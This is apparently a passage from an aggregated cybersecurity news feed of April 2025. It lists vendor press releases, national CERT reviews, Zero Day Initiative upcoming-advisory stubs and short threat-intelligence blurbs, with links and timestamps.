ability to counter threat actors' objectives and pursuits.

https://cloud.google.com/blog/topics/threat-intelligence/2024-zero-day-trends/
NSFOCUS ISOP: Reshaping Security Operations with Autonomous SOC
2025-04-29T04:36:20Z | 1745901380

In the daily operations of traditional Security Operations Centers (SOCs), operators often face two major challenges: NSFOCUS ISOP leverages AI and LLM technologies include NSFGPT and Deepseek to build a autonomous security operations system covering all stage of SOC operations: detection – analysis – response – monitoring. Our aim is: SOC Engineers + SecLLM = Senior Security Experts […] The post NSFOCUS ISOP: Reshaping Security Operations with Autonomous SOC appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-isop-reshaping-security-operations-with-autonomous-soc/
Security Alert (A25-04-24): Multiple Vulnerabilities in Apache Tomcat
2025-04-29T04:00:00Z | 1745899200

The Apache Software Foundation released security updates to address the vulnerabilities in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Uncovering MintsLoader With Recorded Future Malware Intelligence Hunting
2025-04-29T00:00:00Z | 1745884800

Discover how MintsLoader operates as a stealthy, obfuscated malware loader distributing GhostWeaver, StealC, and BOINC. Read Recorded Future’s in-depth analysis of its evasion tactics, DGA-based C2s, and use in phishing and drive-by campaigns.

https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting
CISA Flags Fast Flux as a National Threat—Are You Covered? by Lucie Cardiet
2025-04-29T00:00:00Z | 1745884800

CISA’s latest advisory warns about fast flux—a technique attackers use to evade detection. Learn how Vectra AI’s behavioral analytics detect and stop it.

https://www.vectra.ai/blog/cisa-flags-fast-flux-as-a-national-threat-are-you-covered
Securing the ICS/OT Software Supply Chain: What Schneider Electric’s Discovery Means for Industrial Systems
2025-04-28T20:27:45Z | 1745872065

Industrial systems worldwide share a common weakness in their software supply chains that most security strategies completely miss. Just ask Andy Kling, VP of Cybersecurity at Schneider Electric, one of the world’s leading industrial automation and energy companies. Recently, Andy joined us for a discussion on defending against software supply chain risks and how Schneider […] The post Securing the ICS/OT Software Supply Chain: What Schneider Electric’s Discovery Means for Industrial Systems appeared first on RunSafe Security.

https://runsafesecurity.com/blog/ics-ot-security-software-supply-chain/
Tenable to Highlight Holistic Approach to Cyber Exposure at GISEC 2025
2025-04-28T19:49:41Z | 1745869781

Tenable, the Exposure Management company, today confirmed its participation at GISEC Global 2025 at the Dubai World Trade Centre from 6 - 8 May.  From booth C175 in Hall 5 Tenable will showcase its Tenable One Exposure Management Platform - the world’s first AI-powered exposure management software.  Effective exposure management requires a unified view of the entire attack surface, allowing security teams to detect toxic risk combinations, identify attack path choke points and prioritise weaknesses based on their true impact on the organisation. Tenable One radically unifies security visibility, insight and action across the attack surface, equipping modern organisations to isolate and eradicate priority cyber exposures from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. “Over the past seven years, Tenable has undergone a significant strategic evolution,methodically expanding its capabilities across Identity Security, Cloud Security, OperationalTechnology (OT), Attack Path Analysis and Exposure Analytics,” said Maher Jadallah, Vice President, Middle East & North Africa, Tenable. “Scattered products and siloed views have left organisations struggling to hold back threats across a fragmented attack surface. We know the war against cyber risk can be won with holistic security strategies and solutions. At GISEC we’ll be showing organisations how they can regain control of their environments to reduce their risk and end their exposures." For more information about Tenable and its solutions visit www.tenable.com.

https://www.tenable.com/press-releases/tenable-to-highlight-holistic-approach-to-cyber-exposure-at-gisec-2025
From Regulation to Integration: How Compliance Powers IT/OT Convergence
2025-04-28T18:11:49Z | 1745863909

The post From Regulation to Integration: How Compliance Powers IT/OT Convergence appeared first on Open Systems.

https://www.open-systems.com/blog/from-regulation-to-integration-how-compliance-powers-it-ot-convergence/
Navigating Agentic AI Security: Understanding OWASP Threats and Enabling Authentic & Trusted  Interactions
2025-04-28T17:08:39Z | 1745860119

The artificial intelligence landscape is rapidly evolving and constantly pushing the boundaries of what automated systems can achieve. Today, we’ve moved beyond static programs and even conversational chatbots to the era of Agentic AI. These sophisticated systems are capable of autonomous decision-making, planning, and interacting with complex environments and tools to achieve goals without constant […] The post Navigating Agentic AI Security: Understanding OWASP Threats and Enabling Authentic & Trusted  Interactions appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/agentic-ai-security-owasp-threats/
Data Breach Containment Guide: How to Beat Cyber Threats in Real Time
2025-04-28T14:59:00Z | 1745852340

The average cost of a data breach hit $4.88M in 2024, while the mean time to contain a breach (MTTC) totaled 64 days – on top of the 194 days it took organizations to identify them in the first place. Meanwhile, in the first three months of 2025, ransomware attacks more than doubled compared to the same period last year. Despite rising cybersecurity investments, many organizations still struggle to contain security breaches before they spread to become headline-grabbing crises. Why? Data…

https://zeronetworks.com/blog/data-breach-containment-guide
As Corporate Network Perimeters Fade, Hybrid Cloud Visibility Is Essential
2025-04-28T13:00:00Z | 1745845200

Businesses today are awash in workflows. As those workflows move to multiple clouds and the traditional corporate network perimeter begins to fade, enterprise IT professionals are finding it increasingly difficult to achieve complete control and visibility of data flows and the network traffic they bring in. The simple...

https://www.netscout.com/blog/corporate-network-perimeters-fade-hybrid-cloud-visibility
Palo Alto Networks Cortex XSIAM Delivers Industry's First AI-Driven SecOps Platform to Span Proactive and Reactive Security
2025-04-28T12:25:00Z | 1745843100

Evolves industry-leading capabilities with AI-driven Cortex Exposure management and Advanced Email Security SANTA CLARA, Calif. , April 28, 2025 /PRNewswire/ -- Palo Alto Networks ® (NASDAQ: PANW), the global cybersecurity leader, today unveiled Cortex XSIAM ® 3.0, the next evolution of its

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-cortex-xsiam-delivers-industrys-first-ai
Palo Alto Networks Bolsters SASE Capabilities for Modern Workplace
2025-04-28T12:20:00Z | 1745842800

Unveils Prisma Access Browser 2.0, the world's only SASE-native secure browser, perfect for the perimeterless, cloud-first world SANTA CLARA, Calif. , April 28, 2025 /PRNewswire/ -- Palo Alto Networks ® (NASDAQ: PANW), the global cybersecurity leader, today announced its latest advancements in

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-bolsters-sase-capabilities-modern-workplace
Palo Alto Networks Announces Intent to Acquire Protect AI, a Game-Changing Security for AI Company
2025-04-28T12:15:00Z | 1745842500

The acquisition will enable secure pursuit of AI innovation with confidence by helping customers discover, manage, and protect against AI-specific security risks—securing AI end to end from development to runtime. SANTA CLARA, Calif. , April 28, 2025 /PRNewswire/ -- Palo Alto Networks ® (NASDAQ:

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-announces-intent-acquire-protect-ai-game
Palo Alto Networks Introduces Prisma AIRS: the Foundation on which AI Security Thrives
2025-04-28T12:15:00Z | 1745842500

The world's most comprehensive AI security platform designed to protect the entire AI ecosystem — Apps, agents, models, and data SANTA CLARA, Calif. , April 28, 2025 /PRNewswire/ -- Palo Alto Networks® (NASDAQ: PANW), the world's leading AI cybersecurity company, today announced Prisma AIRS™, a

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-introduces-prisma-airs-foundation-which-ai
Graylog Removes Barriers to SIEM to Deliver Uncompromised Security Operations
2025-04-28T12:05:00Z | 1745841900

Graylog, the no-nonsense platform for Security, API protection, and IT Operations, today launched its Spring 2025 release of Graylog Security—pushing further past the limits of traditional SIEM. The post Graylog Removes Barriers to SIEM to Deliver Uncompromised Security Operations appeared first on Graylog.

https://graylog.org/news/graylog-removes-barriers-to-siem-to-deliver-uncompromised-security-operations/
Cisco and ServiceNow Partner to Simplify and Secure AI Adoption for Businesses at Scale
2025-04-28T12:00:00Z | 1745841600

Cisco and ServiceNow Partner to Simplify and Secure AI Adoption for Businesses at Scale More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/cisco-and-servicenow-partner-to-simplify-and-secure-ai-adoption.html
Cisco Continues to Drive Innovation to Reimagine Security for the AI Era
2025-04-28T12:00:00Z | 1745841600

RSA Conference Press ReleaseMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/cisco-security-reimagine-ai-rsac.html
Cisco and ServiceNow Partner to Simplify and Secure AI Adoption for Businesses at Scale
2025-04-28T12:00:00Z | 1745841600

Cisco and ServiceNow Partner to Simplify and Secure AI Adoption for Businesses at Scale More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/cisco-and-servicenow-partner-to-simplify-and-secure-ai-adoption.html
Cisco Continues to Drive Innovation to Reimagine Security for the AI Era
2025-04-28T12:00:00Z | 1745841600

RSA Conference Press ReleaseMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/cisco-security-reimagine-ai-rsac.html
Combat Rising Account Abuse: Akamai and Ping Identity Partner Up
2025-04-28T12:00:00Z | 1745841600

https://www.akamai.com/blog/security/2025/apr/akamai-and-ping-identity-partner-up
Mastering AI Adoption with End-to-end Security, Everywhere
2025-04-28T11:40:00Z | 1745840400

The pace of innovation in generative AI has been nothing short of explosive. What began with users experimenting with public apps like ChatGPT has rapidly evolved into widespread enterprise adoption. AI features are now seamlessly embedded into everyday business tools, such as customer service platforms like Gladly, HR software like Lattice, and even social media […] The post Mastering AI Adoption with End-to-end Security, Everywhere appeared first on Netskope.

https://www.netskope.com/blog/mastering-ai-adoption-with-end-to-end-security-everywhere
Da bloccati a supportati: aiutare i miei clienti ad atterrare in sicurezza con FireMon
2025-04-28T10:49:19Z | 1745837359

Quando Skybox Security ha chiuso, ho avuto seri dubbi, non solo riguardo al mio lavoro, ma anche su come la situazione avrebbe potuto influire sulla mia credibilità professionale che ho...

https://www.firemon.com/blog/da-bloccati-a-supportati-aiutare-i-miei-clienti-ad-atterrare-in-sicurezza-con-firemon/
Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today’s Adversaries
2025-04-28T09:55:19Z | 1745834119

This report highlights a rarely-discussed but crucially important attack surface: security vendors themselves

https://www.sentinelone.com/labs/top-tier-target-what-it-takes-to-defend-a-cybersecurity-company-from-todays-adversaries/
How safe and secure is your iPhone really?
2025-04-28T09:47:37Z | 1745833657

Your iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.

https://www.welivesecurity.com/en/mobile-security/how-safe-secure-iphone/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 15/2025
2025-04-28T06:02:52Z | 1745820172

This week, we report on current scams and provide the NCSC-FI’s perspective on the denial-of-service attacks observed over the past week.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-152025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 15/2025
2025-04-28T06:02:52Z | 1745820172

This week, we report on current scams and provide the NCSC-FI’s perspective on the denial-of-service attacks observed over the past week.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-152025
Firewall robustness: a key factor in providing protection against cyberattacks
2025-04-28T06:00:52Z | 1745820052

In 2024, France’s ANSSI cybersecurity agency observed an increase in attacks exploiting vulnerabilities in equipment exposed online, including firewalls and VPN gateways used to secure remote access to information systems. Several thousand devices were compromised in France, and dozens of incidents linked to these flaws... The post Firewall robustness: a key factor in providing protection against cyberattacks appeared first on Stormshield.

https://www.stormshield.com/news/firewall-robustness-a-key-factor-in-providing-protection-against-cyberattacks/
NSFOCUS ISOP Receives International Recognition: AI Drives Enterprise Security Operations from “Complex” to “Simple”
2025-04-28T03:46:53Z | 1745812013

Santa Clara, Calif. April 27, 2025 – Recently, NSFOCUS Intelligent Security Operations Platform (NSFOCUS ISOP) was once again recognized by the internationally renowned consulting firm Frost & Sullivan and won the 2024 “Global Modern SIEM Technology Innovation Leadership Award”. Frost & Sullivan Best Practices Recognition awards companies each year in a variety of regional and global […] The post NSFOCUS ISOP Receives International Recognition: AI Drives Enterprise Security Operations from “Complex” to “Simple” appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-isop-receives-international-recognition-ai-drives-enterprise-security-operations-from-complex-to-simple/
Transforming Malware Defense for the AI Era
2025-04-28T00:00:00Z | 1745798400

Recorded Future’s Malware Intelligence rethinks traditional malware analysis to empower organizations to act first against modern threats.

https://www.recordedfuture.com/blog/transforming-malware-defense
Informação sobre Falha na Rede Elétrica Nacional
2025-04-28T00:00:00Z | 1745798400

O CNCS foi informado às 11h30 de uma falha na rede elétrica nacional. Contactadas as entidades incumbentes apurou-se que se trata de uma falha que afetou alguns países europeus. Estamos em contacto com as nossas congéneres nesses países e com as entidades relevantes nacionais. Não foram identificados até ao momento indícios que apontem para um ciberataque. Chamamos a atenção para a circulação de desinformação que ocorre nestas situações pelo que aconselhamos consulta ou a confirmação de informação junto de fontes fidedignas.

https://dyn.cncs.gov.pt/pt/detalhe/art/135922/informacao-sobre-falha-na-rede-eletrica-nacional
AI Agents: What Do They Mean in Cybersecurity? by Jesse Kimbrel
2025-04-28T00:00:00Z | 1745798400

Explore what AI agents mean for cybersecurity teams, specifically how they are helping defenders prioritize the most urgent threats.

https://www.vectra.ai/blog/ai-agents-what-do-they-mean-in-cybersecurity
Spike in Git Config Crawling Highlights Risk of Codebase Exposure
2025-04-28T00:00:00Z | 1745798400

GreyNoise observed a significant increase in crawling activity targeting Git configuration files. While the crawling itself is reconnaissance, successful discovery of exposed Git configuration files can lead to exposure of internal codebases, developer workflows, and potentially sensitive credentials.

https://www.greynoise.io/blog/spike-git-configuration-crawling-risk-codebase-exposure
Expanded Sinkhole Coverage: Two-Thirds More Protection for Your Network
2025-04-25T16:31:01Z | 1745598661

Threat actors never stand still and neither do we. Our Security, Intelligence, and Research team just boosted the number of sinkhole indicators in ThreatSTOP’s threat intelligence by over sixty-six percent. Both IP and domain targets for Sinkholes now enjoy deeper, broader coverage across every ThreatSTOP platform — DNS Defense Cloud, DNS Defense, and IP Defense. The result is clearer visibility into compromise, faster containment, and stronger protection for every device that relies on your network.

https://www.threatstop.com/blog/expanded-sinkhole-coverage-two-thirds-more-protection-for-your-network
Advanced Cryptography: new approaches to data privacy
2025-04-25T13:41:50Z | 1745588510

A new NCSC paper discusses the suitability of emerging Advanced Cryptography techniques.

https://www.ncsc.gov.uk/blog-post/advanced-cryptography-new-approaches-to-data-privacy
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 17/2025
2025-04-25T12:27:50Z | 1745584070

The topics of this week's review include phishing messages in the name of Ajovarma, potential data leak risks in Oracle cloud services for organisations, and Traficom’s updated guideline on security assessment and approval processes for information systems.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-172025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 17/2025
2025-04-25T12:27:50Z | 1745584070

The topics of this week's review include phishing messages in the name of Ajovarma, potential data leak risks in Oracle cloud services for organisations, and Traficom’s updated guideline on security assessment and approval processes for information systems.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-172025
CC-4648 - ConnectWise Releases Security Update for ScreenConnect
2025-04-25T12:04:00Z | 1745582640

Severity: Medium Updates address a flaw in ASP.NET Web Forms which could lead to RCE Updates address a flaw in ASP.NET Web Forms which could lead to RCE Updated: 03 Jun 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4648
A Cisco strategy to support clean energy
2025-04-25T12:00:00Z | 1745582400

In India, Texas, and Spain, innovative Power Purchase Agreements contribute to Cisco’s net-zero goals while helping drive wind and solar development. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/a-cisco-strategy-to-support-clean-energy.html
AI Is Starting to Flex Its Network Security Muscles
2025-04-25T12:00:00Z | 1745582400

https://www.akamai.com/blog/security/2025/apr/ai-starting-flex-network-security-muscles
Nacionalna taksonomija kibernetičkih incidenata
2025-04-25T10:00:21Z | 1745575221

Dana 25. travnja 2025. godine objavljena je Nacionalna taksonomija kibernetičkih incidenata donesena temeljem članka 78. Uredbe o kibernetičkoj sigurnosti (NN 135/2024).  Nacionalna taksonomija kibernetičkih incidenata (Nacionalna taksonomija) predstavlja nacionalni sustav klasifikacije kibernetičkih sigurnosnih incidenata s ciljem unapređenja kibernetičke sigurnosti i odgovora na kibernetičke prijetnje.   Donošenje nacionalne taksonomije omogućava dosljedno evidentiranje, analizu i usklađenu razmjenu informacija... The post Nacionalna taksonomija kibernetičkih incidenata first appeared on CERT.hr.

https://www.cert.hr/nacionalna-taksonomija-incidenata/
Deepfake 'doctors' take to TikTok to peddle bogus cures
2025-04-25T09:00:00Z | 1745571600

Look out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements

https://www.welivesecurity.com/en/social-media/deepfake-doctors-tiktok-bogus-cures/
Otvorene su prijave za drugi Hackultet
2025-04-25T07:46:14Z | 1745567174

Otvorene su prijave za drugi Hackultet – CTF natjecanje za studente u organizaciji Hrvatske akademske i istraživačke mreže – CARNET i Fakulteta elektrotehnike i računarstva Sveučilišta u Zagrebu (FER). Hackultet se provodi u sklopu CARNET-ovog projekta e-Sveučilišta financiranog sredstvima Europske unije iz Nacionalnog plana oporavka i otpornosti. Cilj natjecanja je podići svijest o važnosti primjene... The post Otvorene su prijave za drugi Hackultet first appeared on CERT.hr.

https://www.cert.hr/otvorene-su-prijave-za-drugi-hackultet/
Fraud Increases By 33% in the Year Ending December 2024
2025-04-25T07:26:31Z | 1745565991

Chad Reimers, general manager of fraud & identity at TransUnion in the UK, comments on the recent Office for National Statistics’ Crime in England and Wales Statistics:"The latest Crime in England and Wales figures from the Office for National Statistics reveal that fraud continues to remain high, with offences having increased by 33% (to 4.1 million) in the year ending December 2024. The increase in consumer and retail fraud by 35% since the previous report, comes as TransUnion’s latest Q4 2024 Consumer pulse found that over two in five (43%) UK adults have been targeted by online, email, phone call or text messaging fraud attempts in the last three months.“Over the past year, the fraud threat in the has UK continued to rise. The latest ONS statistics support recent TransUnion insight which shows an increase in identity risk and impersonation fraud, which is – in part - correlated with higher volumes of digital transactions. Given these trends, organisations are considering their most effective defences. In particular, we are observing a parallel shift to expanded use of data insights – including identity, digital, and device attributes and incorporating advanced technology solutions, such as biometrics and document verification.   As noted by the ONS, some of the increase in reported fraud is related to improved data-sharing, which should be viewed as a positive development – industry collaborating effectively is critical in developing effective fraud prevention responses. There may also be an element of consumers responding positively to heightened education measures and being more confident in reporting fraud incidents.“What is clear, is that fraud will remain a threat to business and organisations. In this climate, it’s more important than ever for financial institutions to stay vigilant by investing in smarter, forward-looking strategies that can effectively detect and disrupt evolving fraud threats.”

https://newsroom.transunion.co.uk/fraud-increases-by-33-in-the-year-ending-december-2024/
ZDI-CAN-26824: Delta Electronics
2025-04-25T05:00:00Z | 1745557200

A CVSS score 5.5 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26748: Siemens
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26747: Siemens
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26581: Digilent
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26692: Siemens
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26582: Digilent
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26766: NoMachine
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Xavier DANEST' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26744: Siemens
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26755: Siemens
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26945: NI
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26952: NI
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26950: NI
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26946: NI
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26947: NI
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26944: NI
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27036: Apple
2025-04-25T05:00:00Z | 1745557200

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-25793: Soda PDF
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Xavier DANEST' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27058: Apple
2025-04-25T05:00:00Z | 1745557200

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27041: Apple
2025-04-25T05:00:00Z | 1745557200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Nikolai Skliarenko of Trend Micro Security Research' was reported to the affected vendor on: 2025-04-25, 42 days ago. The vendor is given until 2025-08-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
CyberKnight Strengthens Egypt Presence with Representative Office
2025-04-24T15:02:51Z | 1745506971

The post CyberKnight Strengthens Egypt Presence with Representative Office appeared first on CyberKnight.

https://cyberknight.tech/blog/cyberknight-strengthens-egypt-presence-with-representative-office/
CyberKnight and Scanwave Partner to Advance GRC Across META
2025-04-24T15:00:06Z | 1745506806

The post CyberKnight and Scanwave Partner to Advance GRC Across META appeared first on CyberKnight.

https://cyberknight.tech/blog/cyberknight-and-scanwave-partner-to-advance-grc-across-meta/
Volt Typhoon, Salt Typhoon & APT41: This is No Longer a Drill
2025-04-24T14:12:17Z | 1745503937

New threat intelligence confirms what many infrastructure leaders have long feared: Chinese state-sponsored threat groups are not only capable of infiltrating U.S. critical systems—they already have.

https://mixmode.ai/blog/volt-typhoon-salt-typhoon-apt41-this-is-no-longer-a-drill/
Ransomware in Focus: Meet IMN Crew
2025-04-24T13:59:05Z | 1745503145

'Ransomware in focus' is our series unravelling the complexities of ransomware groups throughout the ecosystem. By detailing their business strategies, target victims, and the tactics, techniques, and procedures (TTPs) behind their operations, we hope to arm businesses with essential knowledge required to confront and overcome the challenges posed by ransomware. In this instalment, we  focus on an emerging threat: that of the new IMN Crew operation.

https://www.s-rminform.com/latest-thinking/ransomware-in-focus-meet-imn-crew
Intelligence Insights: April 2025
2025-04-24T13:53:18Z | 1745502798

Amber Albatross looms large and Arechclient2 makes its debut in this month's edition of Intelligence Insights

https://redcanary.com/blog/threat-intelligence/intelligence-insights-april-2025/
Making It Rain! FWA on the Road to 5G Monetization
2025-04-24T13:22:24Z | 1745500944

You don’t have to look too hard to see that the world is craving more connectivity and higher speeds. In fact, as the average number of people in a household continues to decline, the number of devices per household continues to rise. This trend is evident in a recent report that found “the total amount of fixed...

https://www.netscout.com/blog/making-it-rain-fwa-road-5g-monetization
Deobfuscation techniques: Peephole deobfuscation
2025-04-24T13:00:00Z | 1745499600

In this article we describe a basic deobfuscation technique by leveraging a code snippet substitution.

https://cert.pl/en/posts/2025/04/peephole-deobfuscation/
Valid Clicks, Verified Value: Introducing Ad Click Defense for Platforms
2025-04-24T13:00:00Z | 1745499600

